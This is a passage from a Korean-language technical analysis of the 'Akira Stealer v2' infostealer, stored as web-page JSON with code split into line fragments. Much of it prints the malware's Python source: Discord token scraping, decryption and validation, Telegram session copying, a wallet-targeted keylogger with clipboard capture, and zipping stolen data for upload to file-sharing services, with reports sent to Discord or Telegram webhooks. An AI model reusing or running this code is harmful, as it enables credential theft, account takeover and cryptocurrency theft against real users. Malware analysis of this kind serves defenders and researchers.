os.listdir(db_dir):\n",[1679,8156,8157],{"class":1681,"line":3854},[1679,8158,8159],{},"        if file.endswith(('.log', '.ldb')):\n",[1679,8161,8162],{"class":1681,"line":4103},[1679,8163,8164],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[1679,8166,8167],{"class":1681,"line":5028},[1679,8168,8169],{},"                for pat in patterns:\n",[1679,8171,8172],{"class":1681,"line":5034},[1679,8173,8174],{},"                    for token in re.findall(pat, line):\n",[1679,8176,8177],{"class":1681,"line":5040},[1679,8178,8179],{},"                        # Verify token\n",[1679,8181,8182],{"class":1681,"line":5046},[1679,8183,8184],{},"                        h = {\"Authorization\": token}\n",[1679,8186,8187],{"class":1681,"line":5052},[1679,8188,8189],{},"                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[1679,8191,8192],{"class":1681,"line":5058},[1679,8193,8194],{},"                        if r.status_code == 200:\n",[1679,8196,8197],{"class":1681,"line":5064},[1679,8198,8199],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[1679,8201,8202],{"class":1681,"line":5070},[1679,8203,8204],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[1679,8206,8207],{"class":1681,"line":5076},[1679,8208,8209],{},"                            requests.post(webhook_url, json=payload)\n",[603,8211,8212],{},[606,8213,8214,8217],{},[539,8215,8216],{},"검증",": 유효한 토큰만 게시하여, 만료된 JWT가 전송되는 것을 방지합니다.",[861,8219,8221],{"id":8220},"_784-telegram-세션-파일","7.8.4 Telegram 세션 파일",[532,8223,867],{},[532,8225,8226,8228],{},[539,8227,7845],{}," Telegram Desktop/TData",[587,8230,8232],{"className":4489,"code":8231,"language":4491,"meta":593,"style":593},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[550,8233,8234,8239,8244,8249,8254,8259],{"__ignoreMap":593},[1679,8235,8236],{"class":1681,"line":1682},[1679,8237,8238],{},"def steal_telegram(tdata_path, dest_root):\n",[1679,8240,8241],{"class":1681,"line":2059},[1679,8242,8243],{},"    if os.path.exists(tdata_path):\n",[1679,8245,8246],{"class":1681,"line":2065},[1679,8247,8248],{},"        Utils.TaskKill(\"telegram.exe\")\n",[1679,8250,8251],{"class":1681,"line":2071},[1679,8252,8253],{},"        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[1679,8255,8256],{"class":1681,"line":2393},[1679,8257,8258],{},"        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[1679,8260,8261],{"class":1681,"line":2399},[1679,8262,8263],{},"        data.has_telegram = True\n",[603,8265,8266,8280],{},[606,8267,8268,8271,8272,8275,8276,8279],{},[539,8269,8270],{},"파일",": 세션 키를 담은 ",[550,8273,8274],{},"tdata"," 폴더, secret/unsecret 파일을 담은 ",[550,8277,8278],{},"D877F..."," 폴더.",[606,8281,8282,8285],{},[539,8283,8284],{},"용도",": 공격자의 Telegram 클라이언트에 로드하여 전체 계정에 접근.",[861,8287,8289],{"id":8288},"_785-라이브-지갑-키로깅","7.8.5 라이브 지갑 키로깅",[532,8291,867],{},[532,8293,8294],{},"암호화폐 지갑은 현대 인포스틸러의 최우선 표적입니다. Akira에는 입력 시점에 시드 문구, 개인 키, 암호 같은 지갑 자격 증명을 탈취하도록 특별히 맞춤화된 라이브 키로거가 포함되어 있습니다. 일반 키로거와 달리, 이 키로거는 알려진 지갑 창이 감지될 때만 활성화되어, 노이즈를 극적으로 줄이고 효율을 높입니다.",[532,8296,8297],{},"이 모듈은 활성 창 제목을 모니터링하고 MetaMask, Phantom, Atomic Wallet 등 인기 지갑 앱의 하드코딩된 목록과 비교합니다. 일치하는 창이 포커스되면, 시스템 전역 키보드 훅을 통해 키 입력을 기록하기 시작합니다. 사용자가 Enter를 누르면, 모듈은 즉시 현재 클립보드 내용을 캡처하고(사용자가 지갑 설정이나 로그인 중 비밀을 복사하는 경우가 많다는 점을 이용), 입력된 내용과 클립보드 데이터를 모두 공격자의 웹훅으로 전송합니다. 이 접근은 두 가지 공격 벡터를 결합하기 때문에 매우 효과적입니다:",[603,8299,8300,8303],{},[606,8301,8302],{},"맥락 인식 키로깅. 관련이 있을 때만 민감한 지갑 입력을 캡처합니다.",[606,8304,8305],{},"클립보드 하이재킹. 복사된 복구 문구나 목적지 주소를 붙여넣기 전에 추출합니다.",[532,8307,8308],{},"이 방법들을 결합하면, 공격자는 브라우저 접근이나 파일 유출 없이도 실시간으로 조용히 지갑을 침해할 수 있습니다.",[587,8310,8312],{"className":4489,"code":8311,"language":4491,"meta":593,"style":593},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[550,8313,8314,8319,8323,8328,8333,8338,8343,8348,8352,8357,8362,8367,8372,8377,8382,8387,8392],{"__ignoreMap":593},[1679,8315,8316],{"class":1681,"line":1682},[1679,8317,8318],{},"import keyboard, pyperclip\n",[1679,8320,8321],{"class":1681,"line":2059},[1679,8322,3845],{"emptyLinePlaceholder":325},[1679,8324,8325],{"class":1681,"line":2065},[1679,8326,8327],{},"class WalletKeylogger:\n",[1679,8329,8330],{"class":1681,"line":2071},[1679,8331,8332],{},"    def __init__(self, wallet_titles):\n",[1679,8334,8335],{"class":1681,"line":2393},[1679,8336,8337],{},"        self.buf = \"\"\n",[1679,8339,8340],{"class":1681,"line":2399},[1679,8341,8342],{},"        keyboard.on_release(self.capture)\n",[1679,8344,8345],{"class":1681,"line":3055},[1679,8346,8347],{},"        self.wallet_titles = wallet_titles\n",[1679,8349,8350],{"class":1681,"line":3848},[1679,8351,3845],{"emptyLinePlaceholder":325},[1679,8353,8354],{"class":1681,"line":3854},[1679,8355,8356],{},"    def capture(self, event):\n",[1679,8358,8359],{"class":1681,"line":4103},[1679,8360,8361],{},"        title = pygetwindow.getActiveWindow().title\n",[1679,8363,8364],{"class":1681,"line":5028},[1679,8365,8366],{},"        if any(w in title for w in self.wallet_titles):\n",[1679,8368,8369],{"class":1681,"line":5034},[1679,8370,8371],{},"            if event.name == 'enter':\n",[1679,8373,8374],{"class":1681,"line":5040},[1679,8375,8376],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[1679,8378,8379],{"class":1681,"line":5046},[1679,8380,8381],{},"                send_to_webhook(data)\n",[1679,8383,8384],{"class":1681,"line":5052},[1679,8385,8386],{},"                self.buf = \"\"\n",[1679,8388,8389],{"class":1681,"line":5058},[1679,8390,8391],{},"            else:\n",[1679,8393,8394],{"class":1681,"line":5064},[1679,8395,8396],{},"                self.buf += event.name\n",[603,8398,8399,8405],{},[606,8400,8401,8404],{},[539,8402,8403],{},"트리거 목록",": \"MetaMask\", \"Phantom\", \"Atomic Wallet\" 등을 포함한 창 제목.",[606,8406,8407,8410],{},[539,8408,8409],{},"클립보드",": 복사된 시드나 개인 키를 캡처합니다.",[861,8412,8414],{"id":8413},"_786-패키징-및-유출","7.8.6 패키징 및 유출",[532,8416,867],{},[532,8418,8419],{},"브라우저 데이터, 자격 증명, 지갑 정보, 토큰을 수집한 뒤, Akira는 고도로 자동화되고 은밀한 방식으로 전리품을 통합하고 유출하는 작업으로 진행합니다. 이 단계는 감염 체인의 마지막 단계이며, 신뢰성과 최소한의 포렌식 흔적에 최적화되어 있습니다. 먼저 브라우저 덤프, 로그, 키로깅된 지갑 정보를 포함한 수집된 모든 데이터가 ZIP 아카이브로 압축됩니다. 이는 전체 데이터셋이 단일 페이로드로 전송될 수 있도록 보장합니다. 그다음 아카이브는 가용성에 따라 GoFile, File.io, Oshi.at 같은 여러 공개 파일 공유 서비스에 업로드됩니다. 이 플랫폼들은 익명의 임시 호스팅을 제공하며, 기업 방화벽이나 평판 기반 차단을 우회하는 데 자주 사용됩니다. 동시에 구조화된 보고서가 생성되어 Discord 또는 Telegram 웹훅을 통해 공격자에게 전송됩니다. 여기에는 요약 통계(발견된 지갑 수, 유효한 토큰 수, 탈취된 데이터에 대한 직접 링크)가 포함됩니다. 이는 공격자에게 아카이브를 열지 않고도 표적의 가치를 빠르게 개관할 수 있게 합니다.",[532,8421,8422],{},"마지막으로, 멀웨어는 임시 폴더와 아카이브를 디스크에서 삭제하여, 로컬 포렌식 증거를 효과적으로 제거합니다. 방어자가 감염을 발견할 무렵이면 데이터는 이미 사라졌으며, 종종 복구 불가능합니다.",[587,8424,8426],{"className":4489,"code":8425,"language":4491,"meta":593,"style":593},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & ZIP\nUtils.clear_client_folder()\n",[550,8427,8428,8433,8438,8443,8448,8453,8458,8463,8468,8473,8478,8483,8488,8493,8498,8502,8507,8512],{"__ignoreMap":593},[1679,8429,8430],{"class":1681,"line":1682},[1679,8431,8432],{},"# 1) ZIP everything (including Wallets folder)\n",[1679,8434,8435],{"class":1681,"line":2059},[1679,8436,8437],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[1679,8439,8440],{"class":1681,"line":2065},[1679,8441,8442],{},"# 2) Attempt upload to primary & fallback services\n",[1679,8444,8445],{"class":1681,"line":2071},[1679,8446,8447],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1679,8449,8450],{"class":1681,"line":2393},[1679,8451,8452],{},"# 3) Report summary\n",[1679,8454,8455],{"class":1681,"line":2399},[1679,8456,8457],{},"embed = {\n",[1679,8459,8460],{"class":1681,"line":3055},[1679,8461,8462],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[1679,8464,8465],{"class":1681,"line":3848},[1679,8466,8467],{},"    \"fields\": [\n",[1679,8469,8470],{"class":1681,"line":3854},[1679,8471,8472],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[1679,8474,8475],{"class":1681,"line":4103},[1679,8476,8477],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[1679,8479,8480],{"class":1681,"line":5028},[1679,8481,8482],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[1679,8484,8485],{"class":1681,"line":5034},[1679,8486,8487],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[1679,8489,8490],{"class":1681,"line":5040},[1679,8491,8492],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[1679,8494,8495],{"class":1681,"line":5046},[1679,8496,8497],{},"    ]\n",[1679,8499,8500],{"class":1681,"line":5052},[1679,8501,2402],{},[1679,8503,8504],{"class":1681,"line":5058},[1679,8505,8506],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[1679,8508,8509],{"class":1681,"line":5064},[1679,8510,8511],{},"# 4) Cleanup local folder & ZIP\n",[1679,8513,8514],{"class":1681,"line":5070},[1679,8515,7697],{},[713,8517,8519,8520,2013],{"id":8518},"_79-discord-및-telegram-토큰-탈취클래스-discord","7.9. Discord 및 Telegram 토큰 탈취(클래스: ",[550,8521,1317],{},[532,8523,719],{},[532,8525,8526,8527,8529],{},"Akira Stealer v2의 ",[539,8528,1317],{}," 클래스는 Discord 인증 토큰과 Telegram 세션 데이터를 모두 수집하기 위해 고도로 병렬화된 다단계 프로세스를 실행합니다. 아래에서는 각 구성 요소를 정확한 코드 참조와 예시로 해부합니다.",[861,8531,8533],{"id":8532},"_791-초기화-및-경로-열거","7.9.1 초기화 및 경로 열거",[532,8535,867],{},[532,8537,8538],{},"인스턴스화 시, 생성자는 두 개의 대상 경로 집합을 구성합니다:",[587,8540,8542],{"className":4489,"code":8541,"language":4491,"meta":593,"style":593},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[550,8543,8544,8549,8554,8559,8564,8568,8572,8576,8581,8586,8591,8596,8600],{"__ignoreMap":593},[1679,8545,8546],{"class":1681,"line":1682},[1679,8547,8548],{},"# Discord client LevelDB directories\n",[1679,8550,8551],{"class":1681,"line":2059},[1679,8552,8553],{},"discord_paths = [\n",[1679,8555,8556],{"class":1681,"line":2065},[1679,8557,8558],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[1679,8560,8561],{"class":1681,"line":2071},[1679,8562,8563],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[1679,8565,8566],{"class":1681,"line":2393},[1679,8567,3835],{},[1679,8569,8570],{"class":1681,"line":2399},[1679,8571,7921],{},[1679,8573,8574],{"class":1681,"line":3055},[1679,8575,3845],{"emptyLinePlaceholder":325},[1679,8577,8578],{"class":1681,"line":3848},[1679,8579,8580],{},"# Chromium-based browser LevelDB directories\n",[1679,8582,8583],{"class":1681,"line":3854},[1679,8584,8585],{},"browserPaths = [\n",[1679,8587,8588],{"class":1681,"line":4103},[1679,8589,8590],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[1679,8592,8593],{"class":1681,"line":5028},[1679,8594,8595],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[1679,8597,8598],{"class":1681,"line":5034},[1679,8599,3835],{},[1679,8601,8602],{"class":1681,"line":5040},[1679,8603,7921],{},[603,8605,8606,8615],{},[606,8607,8608,1538,8611,8614],{},[539,8609,8610],{},"Discord 경로",[550,8612,8613],{},"%APPDATA%"," 아래의 공식 및 비공식 Discord 클라이언트를 겨냥합니다.",[606,8616,8617,8620],{},[539,8618,8619],{},"브라우저 경로","는 로컬 저장소와 확장을 위한 하위 폴더를 포함해 인기 브라우저의 사용자 데이터 폴더를 다룹니다.",[532,8622,8623],{},"각 항목에 대해 스레드가 생성됩니다:",[587,8625,8627],{"className":4489,"code":8626,"language":4491,"meta":593,"style":593},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    t.start()\n",[550,8628,8629,8634,8639,8644,8649,8654],{"__ignoreMap":593},[1679,8630,8631],{"class":1681,"line":1682},[1679,8632,8633],{},"for patt in browserPaths:\n",[1679,8635,8636],{"class":1681,"line":2059},[1679,8637,8638],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[1679,8640,8641],{"class":1681,"line":2065},[1679,8642,8643],{},"    t.start()\n",[1679,8645,8646],{"class":1681,"line":2071},[1679,8647,8648],{},"for patt in discord_paths:\n",[1679,8650,8651],{"class":1681,"line":2393},[1679,8652,8653],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[1679,8655,8656],{"class":1681,"line":2399},[1679,8657,8643],{},[532,8659,8660],{},"이 스레딩 모델은 I/O 처리량을 극대화하여, 수십 개의 디렉터리를 동시에 탐침합니다.",[861,8662,8664],{"id":8663},"_792-토큰-추출-로직","7.9.2 토큰 추출 로직",[532,8666,867],{},[532,8668,8669],{},[539,8670,8671],{},"브라우저에서 평문 토큰 긁어오기",[532,8673,8674,8677,8678,2679,8681,8684],{},[550,8675,8676],{},"get_btoken(path, arg)","는 각 LevelDB 폴더로 이동하여 ",[550,8679,8680],{},".log",[550,8682,8683],{},".ldb"," 파일을 검사합니다:",[587,8686,8688],{"className":4489,"code":8687,"language":4491,"meta":593,"style":593},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[550,8689,8690,8695,8700,8705,8710,8715,8720,8725],{"__ignoreMap":593},[1679,8691,8692],{"class":1681,"line":1682},[1679,8693,8694],{},"for file in os.listdir(path + arg):\n",[1679,8696,8697],{"class":1681,"line":2059},[1679,8698,8699],{},"    if file.endswith((\".log\", \".ldb\")):\n",[1679,8701,8702],{"class":1681,"line":2065},[1679,8703,8704],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[1679,8706,8707],{"class":1681,"line":2071},[1679,8708,8709],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[1679,8711,8712],{"class":1681,"line":2393},[1679,8713,8714],{},"                tokens = re.findall(regex, line)\n",[1679,8716,8717],{"class":1681,"line":2399},[1679,8718,8719],{},"                for token in tokens:\n",[1679,8721,8722],{"class":1681,"line":3055},[1679,8723,8724],{},"                    self.tokens.append(token)\n",[1679,8726,8727],{"class":1681,"line":3848},[1679,8728,8729],{},"                    self.cehckToken(token)\n",[603,8731,8732,8741,8749],{},[606,8733,8734,8740],{},[539,8735,8736,8737],{},"정규식 ",[550,8738,8739],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," 는 표준 Discord 토큰과 일치합니다.",[606,8742,8743,8748],{},[539,8744,8736,8745],{},[550,8746,8747],{},"mfa\\.[\\w-]{80,95}"," 는 MFA 토큰을 캡처합니다.",[606,8750,8751,8752,8755],{},"중복 제거는 암묵적입니다. 토큰은 검증 전에 ",[550,8753,8754],{},"self.tokens","에 저장됩니다.",[532,8757,8758],{},[539,8759,8760],{},"Discord 클라이언트에서 암호화된 토큰 복호화",[532,8762,8763,8764,8766,8767,8769,8770,8773],{},"Discord 클라이언트는 ",[550,8765,6495],{}," 또는 ",[550,8768,6499],{},"로 시작하는 DPAPI 아래에서 Local Storage 항목을 암호화합니다. ",[550,8771,8772],{},"get_discord(path, arg)","가 이를 처리합니다:",[587,8775,8777],{"className":4489,"code":8776,"language":4491,"meta":593,"style":593},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[550,8778,8779,8784,8789,8793,8798,8803,8807,8812,8816,8820,8825,8830,8835,8840,8845],{"__ignoreMap":593},[1679,8780,8781],{"class":1681,"line":1682},[1679,8782,8783],{},"# Read Local State to obtain encrypted master key\n",[1679,8785,8786],{"class":1681,"line":2059},[1679,8787,8788],{},"with open(path + \"/Local State\", 'r') as f:\n",[1679,8790,8791],{"class":1681,"line":2065},[1679,8792,7097],{},[1679,8794,8795],{"class":1681,"line":2071},[1679,8796,8797],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[1679,8799,8800],{"class":1681,"line":2393},[1679,8801,8802],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[1679,8804,8805],{"class":1681,"line":2399},[1679,8806,3845],{"emptyLinePlaceholder":325},[1679,8808,8809],{"class":1681,"line":3055},[1679,8810,8811],{},"# Iterate LevelDB files for Base64 payloads\n",[1679,8813,8814],{"class":1681,"line":3848},[1679,8815,8694],{},[1679,8817,8818],{"class":1681,"line":3854},[1679,8819,8699],{},[1679,8821,8822],{"class":1681,"line":4103},[1679,8823,8824],{},"        for line in open(f\"{path}{arg}/{file}\"):\n",[1679,8826,8827],{"class":1681,"line":5028},[1679,8828,8829],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[1679,8831,8832],{"class":1681,"line":5034},[1679,8833,8834],{},"                ciphertext = b64decode(token_part)\n",[1679,8836,8837],{"class":1681,"line":5040},[1679,8838,8839],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[1679,8841,8842],{"class":1681,"line":5046},[1679,8843,8844],{},"                self.tokens.append(token)\n",[1679,8846,8847],{"class":1681,"line":5052},[1679,8848,8849],{},"                self.cehckToken(token)\n",[603,8851,8852,8861],{},[606,8853,8854,8857,8858,8860],{},[539,8855,8856],{},"마스터 키 복구",": 5바이트 DPAPI 헤더를 제거한 뒤, ",[550,8859,7164],{},"(Windows DPAPI를 감쌈)를 호출하여 AES-GCM 키를 복호화합니다.",[606,8862,8863,8866,8867,8870,8871,8874,8875],{},[539,8864,8865],{},"페이로드 파싱",": 토큰은 ",[550,8868,8869],{},"dQw4w9WgXcQ:","(공격자가 선택한 마커)로 접두됩니다. Base64 디코딩 후, ",[550,8872,8873],{},"decrypt_value()","가 IV와 암호문을 분리합니다:",[587,8876,8878],{"className":4489,"code":8877,"language":4491,"meta":593,"style":593},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[550,8879,8880,8885,8890,8895,8900],{"__ignoreMap":593},[1679,8881,8882],{"class":1681,"line":1682},[1679,8883,8884],{},"def decrypt\\_value(buff, master\\_key):\n",[1679,8886,8887],{"class":1681,"line":2059},[1679,8888,8889],{},"iv = buff\\[3:15]\n",[1679,8891,8892],{"class":1681,"line":2065},[1679,8893,8894],{},"payload = buff\\[15:]\n",[1679,8896,8897],{"class":1681,"line":2071},[1679,8898,8899],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[1679,8901,8902],{"class":1681,"line":2393},[1679,8903,8904],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[861,8906,8908],{"id":8907},"_793-토큰-검증-및-유출","7.9.3 토큰 검증 및 유출",[532,8910,867],{},[532,8912,8913],{},"추출된 각 토큰은 라이브 API 호출을 통해 검증됩니다:",[587,8915,8918],{"className":8916,"code":8917,"language":592},[590],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[550,8919,8917],{"__ignoreMap":593},[603,8921,8922],{},[606,8923,8924,619,8927,8930,8931,8934,8935],{},[539,8925,8926],{},"성공 시",[550,8928,8929],{},"cehckToken()","은 Telegram(",[550,8932,8933],{},"useTg=True",")을 통해 전송할지 Discord 웹훅을 통해 전송할지 결정합니다:",[587,8936,8938],{"className":4489,"code":8937,"language":4491,"meta":593,"style":593},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[550,8939,8940,8945,8950,8955],{"__ignoreMap":593},[1679,8941,8942],{"class":1681,"line":1682},[1679,8943,8944],{},"if useTg:\n",[1679,8946,8947],{"class":1681,"line":2059},[1679,8948,8949],{},"self.sendTokenTg(token)\n",[1679,8951,8952],{"class":1681,"line":2065},[1679,8953,8954],{},"else:\n",[1679,8956,8957],{"class":1681,"line":2071},[1679,8958,8959],{},"self.send\\_embed(token)\n",[603,8961,8962],{},[606,8963,8964,8969],{},[539,8965,8966],{},[550,8967,8968],{},"send_embed"," 는 다음 필드를 사용해 사용자 메타데이터(사용자명, 디스크리미네이터, 이메일, Nitro 상태, 결제 정보)를 담은 풍부한 Discord 임베드를 만듭니다",[587,8971,8974],{"className":8972,"code":8973,"language":592},[590],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[550,8975,8973],{"__ignoreMap":593},[603,8977,8978],{},[606,8979,8980,8985],{},[539,8981,8982],{},[550,8983,8984],{},"sendTokenTg"," 는 Telegram API를 통해 평문 요약을 전송합니다.",[861,8987,8989],{"id":8988},"_794-telegram-세션-수집","7.9.4 Telegram 세션 수집",[532,8991,867],{},[532,8993,8994],{},"Discord 토큰 외에도, 스틸러는 Telegram Desktop 세션을 탈취합니다:",[587,8996,8998],{"className":4489,"code":8997,"language":4491,"meta":593,"style":593},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[550,8999,9000,9004,9009,9014,9019],{"__ignoreMap":593},[1679,9001,9002],{"class":1681,"line":1682},[1679,9003,4980],{},[1679,9005,9006],{"class":1681,"line":2059},[1679,9007,9008],{},"def steal_telegram():\n",[1679,9010,9011],{"class":1681,"line":2065},[1679,9012,9013],{},"    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[1679,9015,9016],{"class":1681,"line":2071},[1679,9017,9018],{},"    Utils.TaskKill(\"telegram.exe\")\n",[1679,9020,9021],{"class":1681,"line":2393},[1679,9022,9023],{},"    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[603,9025,9026,9032,9041],{},[606,9027,9028,9031],{},[539,9029,9030],{},"프로세스 종료",": 파일 잠금이 해제되도록 보장합니다.",[606,9033,9034,9037,9038,9040],{},[539,9035,9036],{},"재귀적 복사",": 사용자 세션, 연락처, 캐시된 메시지를 포함한 ",[550,9039,8274],{}," 폴더를 탈취합니다.",[606,9042,9043,9045,9046,9049],{},[539,9044,1333],{},": 탈취된 폴더는 압축되어 ",[550,9047,9048],{},"sendFilesTG()","를 통해 업로드되며, 다운로드 링크가 Telegram 메시지에 삽입됩니다.",[532,9051,9052,9053,9055],{},"Akira Stealer의 ",[550,9054,1317],{}," 모듈은 정규식 기반 긁어오기, DPAPI 기반 AES-GCM 복호화, 라이브 API 검증, 다중 프로토콜 유출(웹훅 + Telegram)을 결합하여 Discord와 Telegram 플랫폼 전반에 걸쳐 원활한 계정 탈취 기능을 제공합니다.",[713,9057,9059],{"id":9058},"_710-시스템-프로파일링","7.10 시스템 프로파일링",[532,9061,719],{},[532,9063,9064,9065,9068],{},"Akira Stealer v2는 호스트 메타데이터, 환경 속성, 네트워크 세부 정보를 수집하는 광범위한 시스템 프로파일링 단계를 통합합니다. 이 정보는 ",[550,9066,9067],{},"Data"," 클래스에 취합되어 이후 유출된 자격 증명과 함께 패키징됩니다. 아래에서는 직접적인 코드 참조와 함께 프로파일링 로직을 분해합니다.",[861,9070,9072,9073,9075],{"id":9071},"_7101-data-클래스-초기화","7.10.1 ",[550,9074,9067],{}," 클래스 초기화",[532,9077,867],{},[532,9079,9080,9081,9083],{},"시작 시 ",[550,9082,9067],{},"의 인스턴스가 생성됩니다:",[587,9085,9087],{"className":4489,"code":9086,"language":4491,"meta":593,"style":593},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[550,9088,9089,9094,9099,9104,9109,9114,9119,9124,9129,9134],{"__ignoreMap":593},[1679,9090,9091],{"class":1681,"line":1682},[1679,9092,9093],{},"class Data:\n",[1679,9095,9096],{"class":1681,"line":2059},[1679,9097,9098],{},"    def __init__(self):\n",[1679,9100,9101],{"class":1681,"line":2065},[1679,9102,9103],{},"        self.username = os.getlogin()\n",[1679,9105,9106],{"class":1681,"line":2071},[1679,9107,9108],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[1679,9110,9111],{"class":1681,"line":2393},[1679,9112,9113],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[1679,9115,9116],{"class":1681,"line":2399},[1679,9117,9118],{},"        